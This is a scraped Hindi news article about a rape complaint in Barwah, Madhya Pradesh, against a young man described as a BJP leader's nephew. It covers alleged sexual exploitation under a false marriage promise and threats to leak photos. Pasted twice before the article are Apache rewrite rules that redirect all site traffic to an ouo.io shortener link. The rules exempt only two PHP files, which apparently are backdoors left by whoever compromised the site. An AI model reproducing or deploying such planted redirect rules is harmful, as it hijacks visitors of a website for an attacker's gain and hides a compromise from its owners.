
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 487
Nextभोपाल। मध्यप्रदेश में खरगोन जिले के बड़वाह में भाजपा नेता के भतीजे द्वारा एक छात्रा से शादी का झांसा देकर दुष्कर्म किए जाने का मामला सामने आया है। छात्रा की शिकायत पर पुलिस ने आरोपी युवक के खिलाफ दुष्कर्म का प्रकरण दर्ज कर लिया है। कहा जा रहा है कि आरोपी युवक एक यूनिक सुराणा भाजपा के एक नेता का भतीजा है। आरोपी ने छात्रा के साथ शादी से इनकार करते हुए दोनों के वीडियो सोशल मीडिया में वायरल करने की भी धमकी दी थी। आरोपी युवक की सीएम शिवराज सिंह चौहान सहित भाजपा के कई दिग्गज नेताओं के साथ तस्वीरें भी सामने आई हैं। पीड़ित छात्रा के परिजनों ने रिपोर्ट देकर बताया कि उनकी बेटी बड़वानी में कक्षा 12वीं में अध्यनरत है। वो बड़वाह निवासी अपनी बुआ के घर नवरात्र के दौरान घूमने आई थी। तब से ही यूनिक सुराणा नाम का युवक उससे दोस्ती करने के लिए पीछे पड़ा था। इसके बाद उसने छात्रा से दोस्ती कर ली और उससे शादी करने का वादा कर शारीरिक संबंध बनाए। आरोपी ने एक साल तक छात्रा को शादी का झांसा देता रहा और उसका यौन शोषण करता रहा। पीड़ित के शादी के लिए दबाव बनाने पर वो शादी की बात से मुकर गया और दोनों के अश्लील फोटो सोशल मीडिया पर वायरल करने की धमकी दी।